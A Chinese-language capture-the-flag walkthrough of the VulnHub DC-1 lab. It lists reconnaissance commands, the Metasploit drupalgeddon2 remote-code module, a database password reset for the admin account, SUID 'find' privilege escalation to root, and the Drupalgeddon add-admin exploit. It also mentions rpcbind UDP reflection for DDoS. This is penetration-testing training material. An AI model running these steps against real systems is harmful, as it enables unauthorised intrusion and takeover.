DC1

下载地址：

https://download.vulnhub.com/dc/DC-1.zip

题目要求：

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

信息收集

1.1 arp-scan -l

1.2 ifconfig

1.3 nmap -p- -sV 192.168.126.130

发现rpcbind

111端口rpcbind服务 可以利用udp反射进行ddos攻击

1.4 whatweb

渗透

2.1 发现drupal 7

2.2 进入msf

2.3 search drupal

2.3 尝试到unix/webapp/drupal_drupalgeddon2远程命令执行漏洞

use 1

show options

set rhost 192.168.126.130

run

getshell成功

sysinfo(help查看可用命令)

ls

2.4 发现flag1.txt

cat flag1.txt

数据库

3.1 提示drupal网站配置文件有东西

3.2 发现数据库

3.3 切换到主机的cmd中

shell

或者

shell

获取完全交互式终端

python -c 'import pty;pty.spawn("/bin/bash")'

或

script /dev/null

3.4 mysql -udbuser -p

R0ck3t

show databases;

use drupaldb;

show tables;

select * from users;

（退出exit）

3.5 由前面查看网站配置文件时发现加盐MD5

所以该hash无法爆破

另辟蹊径

3.6 密码重置

find / -name "password-hash.sh"

php /var/www/scripts/password-hash.sh 123

复制加salt之后的md5

$S$DRg21kugCL0AGQqr1G90hPfO.XkoCuhFqYU.HZfT8me7BiSMlYPT

再次进入mysql中

update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;

4.1 登录后台

http://192.168.126.130

左上角的context

4.2 找到flag3

根据提示

cat /etc/passwd

cat /home/flag4.txt

4.3找到flag4

提权

5.1 根据flag4提示提权

linux提权之suid提权

5.2 查找具有suid的命令

find / -perm -u=s -type f 2>/dev/null

find本身就有suid

5.3 find提权

find /usr/bin/find -exec "/bin/sh" \;

cd /root

cat thefinalflag.txt

5.4 找到最后一个flag

排漏

3.7 CVE-2014-3704-Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)

3.8 searchsploit Drupal

发现Drupal 7 有一个admin用户添加漏洞

3.9 定位

locate php/webapps/34992.py

3.10 复制到桌面

cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./

3.11 查看用法

cat 34992.py

3.12 添加test/test成功

3.13 登录后台

3.14 也是可以看到flag3